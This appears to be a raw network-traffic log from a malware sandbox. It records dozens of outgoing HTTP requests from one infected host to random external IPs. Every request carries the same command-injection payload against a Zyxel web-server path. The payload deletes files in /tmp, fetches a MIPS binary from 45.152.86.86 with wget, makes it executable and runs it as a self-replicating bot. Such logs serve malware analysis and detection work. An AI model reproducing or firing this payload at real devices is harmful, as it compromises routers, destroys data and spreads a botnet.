                                        Mar 31, 2024 09:21:14.840236902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4335192.168.2.234220066.165.152.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840302944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4336192.168.2.2345754109.41.182.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840337992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4337192.168.2.234333838.175.45.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840383053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4338192.168.2.2347082160.142.136.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840425014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4339192.168.2.2348604113.21.178.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840475082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4340192.168.2.2341076143.247.30.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840518951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4341192.168.2.2342528120.175.232.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840563059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4342192.168.2.2351490164.194.194.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840601921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4343192.168.2.2337138177.163.110.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840640068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4344192.168.2.2336424115.203.221.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840677977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4345192.168.2.235953035.94.111.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840737104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4346192.168.2.2352756219.199.21.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840781927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4347192.168.2.2346786174.227.146.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840828896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4348192.168.2.2342882140.100.241.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840879917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4349192.168.2.2338044184.9.37.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840926886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4350192.168.2.234307667.164.63.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840949059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4351192.168.2.2355794111.7.155.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840993881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4352192.168.2.234542651.111.218.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.841048002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4353192.168.2.234923648.78.249.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.841089010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4354192.168.2.234923664.61.233.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.841130972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4355192.168.2.235063214.201.15.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849581003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4356192.168.2.234692267.197.65.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849617004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4357192.168.2.234216889.135.59.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849654913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4358192.168.2.2356056186.29.97.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849698067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4359192.168.2.2355372161.84.186.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849725962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4360192.168.2.2342296105.148.127.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849773884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4361192.168.2.23484742.188.204.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849808931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4362192.168.2.2333590179.55.198.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849865913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4363192.168.2.233929284.117.146.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.849905014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4364192.168.2.2340560203.17.250.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.850227118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4365192.168.2.235493688.38.159.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.850280046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4366192.168.2.2353788174.213.168.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:15.850326061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4367192.168.2.2346136208.112.187.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:16.854156971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4368192.168.2.2348116202.152.10.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.873959064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4369192.168.2.233741678.213.157.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874001980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4370192.168.2.234537663.56.53.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874047995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4371192.168.2.235651874.87.153.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874088049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4372192.168.2.233559850.194.244.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874155045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4373192.168.2.234733417.210.123.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874224901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4374192.168.2.23559345.26.55.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874315023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4375192.168.2.2336406114.191.245.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874372005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4376192.168.2.23546588.109.94.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874452114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4377192.168.2.2339344167.223.142.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874525070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4378192.168.2.235525679.10.97.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874584913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4379192.168.2.2352600163.82.47.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874650955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4380192.168.2.2342468198.228.98.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874711037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4381192.168.2.233772276.242.96.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874773026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4382192.168.2.2357534186.254.251.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874847889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4383192.168.2.2348082170.136.152.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874924898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4384192.168.2.2341630136.35.241.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.874989033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4385192.168.2.2356858112.239.68.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875057936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4386192.168.2.2350104156.215.85.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875125885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4387192.168.2.2337058159.119.198.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875221968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4388192.168.2.2348830183.226.209.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875257015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4389192.168.2.2356676175.48.155.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875319004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4390192.168.2.2350968210.147.236.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875384092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4391192.168.2.2345794138.201.206.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875451088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4392192.168.2.2339018207.20.248.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875530958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4393192.168.2.233695866.232.120.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875595093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4394192.168.2.235905293.202.146.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875644922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4395192.168.2.2336548152.42.107.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875703096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4396192.168.2.2340384137.155.220.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875792980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4397192.168.2.23578828.195.20.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875827074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4398192.168.2.2350526123.54.60.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875921011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4399192.168.2.234800662.116.175.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.875952005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4400192.168.2.2355466123.22.104.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876051903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4401192.168.2.233984248.81.173.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876104116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4402192.168.2.2357640218.10.253.104443
                                        TimestampBytes transferredDirectionData
